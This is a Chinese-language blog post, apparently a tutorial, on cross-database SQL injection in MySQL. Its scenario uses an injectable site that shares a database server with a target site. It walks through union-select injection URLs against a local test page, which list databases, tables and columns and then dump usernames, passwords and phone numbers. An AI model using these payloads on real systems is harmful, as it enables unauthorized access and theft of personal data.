mysql高权限跨库注入

一、高权限跨库注入的作用

当多个网站部署于同一数据库系统下:

1
2
3
4
|mysql数据库
|---数据库A——网站A
|---数据库B——网站B
|---数据库C——网站C

假设网站A为我们的目标站点,无sql注入漏洞,而网站B具有sql注入漏洞,且为高权限注入点,那么就可以通过高权限跨库注入获得网站A的数据。

二、高权限跨库注入流程

2.1)确认注入点权限

确认注入点权限及获取连接当前数据库的账户

2.2)information_schema

这里再贴一遍mysql中的特殊数据库(ver 5.0以上)information_schema中的表及字段结构:

1
2
|information_schema.schemata:记录所有数据库名的表
|----schema_name:数据库名
1
2
3
|information_schema.tables:记录所有数据库下的表名信息的表
|----table_schema:数据库名
|----table_name:表名
1
2
3
4
|information_schema.columns:记录所有数据库下所有表的列名信息的表
|----table_schema:数据库名
|----table_name:表名
|----Column_name:列名

接下来的步骤与前文mysql常见注入流程中一致

2.3)获取所有数据库名称

1
http://127.0.0.1/test/sqlin.php?x=1 union select schema_name,2,3 from information_schema.schemata

2.4)获取目标数据库下的表名

1
http://127.0.0.1/test/sqlin.php?x=1 union select table_name,2,3 from information_schema.tables where table_schema='yume'

2.5)获取目标表名下的列名

1
http://127.0.0.1/test/sqlin.php?x=1 union select Column_name,2,3 from information_schema.columns where table_schema='yume' and table_name='user'

2.6)获取目标表下的数据

1
http://127.0.0.1/test/sqlin.php?x=1 union select username,password,phonenumber from yume.user

文章作者: TechOtaku
文章链接: http://techotaku.me/2018/07/26/mysql高权限跨库注入/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 徒然の博客